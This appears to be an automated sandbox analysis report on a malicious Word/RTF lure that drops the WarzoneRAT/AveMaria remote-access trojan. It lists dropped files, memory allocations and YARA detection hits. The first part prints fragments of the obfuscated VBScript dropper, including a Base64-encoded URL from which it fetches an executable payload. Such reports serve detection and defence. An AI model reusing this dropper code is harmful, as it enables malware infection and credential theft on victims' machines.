lfkfdiooie = lfkfdiooie + "-16le".. If LCase(xtexenc) = lfkfdiooie then.. ' UTF-16 LE happens to be VBScript's internal encoding, so we can.. ' take a shortcut and use CStr() to directly convert the byte array.. ' to a string... knrudogh = "BytesToStr = CStr(byteArray)".. var1 = knrudogh.. sn556 = "ex" + "ec" + "ute" + "(var1)".. kjkxvlsvllf=0:execute sn556.. Else ' Convert the specified text encoding to a VBScript string... ' Create a binary stream and copy the input byte array to it... vgct783hth = "bj".. vgct783hth = vgct783hth + "ect".. piiing = "CreateO" + vgct783hth.. ldiwuywfj = "Set ".. lsvosfouwoupwiot = ldiwuywfj + "baax = " + piiing + "(aaax)".... var1 = lsvosfouwoupwiot.. sn556 = "ex" + "ecute(var1)"..
          Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.drStream path '_1725426018/\x1Ole10Native' : ;....DZdtfhgYgeghD{.scT.C:\osdsTggH\DZdtfhgYgeghD{.scT.....6...C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{.scT.w:....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2xvZ2luLjkyOTM4OS5hbmt1cmEudXMvQXdPZ1lpV0cvZXhwbG9yZXIuZXhl" '98t9t..yulkytjtrhtjrkdsarjky ="ZXhwbG9yZXIuZXhl" '98t9t....sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"..sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"....Function age64Procode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. ' available via .nodeTypedValue, which we can pass to BytesToStr().. kvjusvsfdcsb = "bje".. cvbnm = "CreateO" + kvjusvsfdcsb + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"").C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + cvbnm + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987235:execute sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = odjeiojfyd2f8fu34u.... sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987234:execute(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987236:execute sn556.... age64Procode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....function BytesToStr(ByVal byteArray, ByVal xtexenc).. lfkfdiooie = "utf".. lfkfdiooie = lfkfdiooie + "-16le".. If LCase(xtexenc) = lfkfdiooie then.. ' UTF-16 LE happens to be VBScript's internal encoding, so we can.. ' take a shortcut and use CStr() to directly convert the byte array.. ' to a string... knrudogh = "BytesToStr = CStr(byteArray)".. var1 = knrudogh.. sn556 = "ex" + "ec" + "ute" + "(var1)".. kjkxvlsvllf=0:execute sn556.. Else ' Convert the specified text encoding to a VBScript string... ' Create a binary stream and copy the input byte array to it... vgct783hth = "bj".. vgct783hth = vgct783hth + "ect".. piiing = "CreateO" + vgct783hth.. ldiwuywfj = "Set ".. lsvosfouwoupwiot = ldiwuywfj + "baax = " + piiing + "(aaax)".... var1 = lsvosfouwoupwiot.. sn556 = "e
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\explorer.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scTJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scTJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exeJump to dropped file
          Source: DZdtfhgYgeghD{.scTStatic RTF information: Object: 0 Offset: 000007D1h DZdtfhgYgeghD{.scT
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_001900C8
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_00197650
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_00197219
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_00197228
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_00197640
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_001907EE
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_0131A760
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_01310048
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_05890048
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_002B00C8
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_002B7650
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_002B7228
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_002B7219
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_002B7640
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_002B07E0
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_04E09850
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_04E00042
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_04E00048
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F00048
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F00038
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_001F00C8
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_001F7650
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_001F7219
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_001F7228
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_001F07E0
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_01329850
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_01320048
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_05500048
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_05500006
          Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: explorer[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: explorer.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: eDdYRRbouy.exe.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory allocated: 77740000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 77620000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 77740000 page execute and read and write
          Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc, type: SAMPLEMatched rule: INDICATOR_RTF_Exploit_Scripting author = ditekSHen, description = detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.
          Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
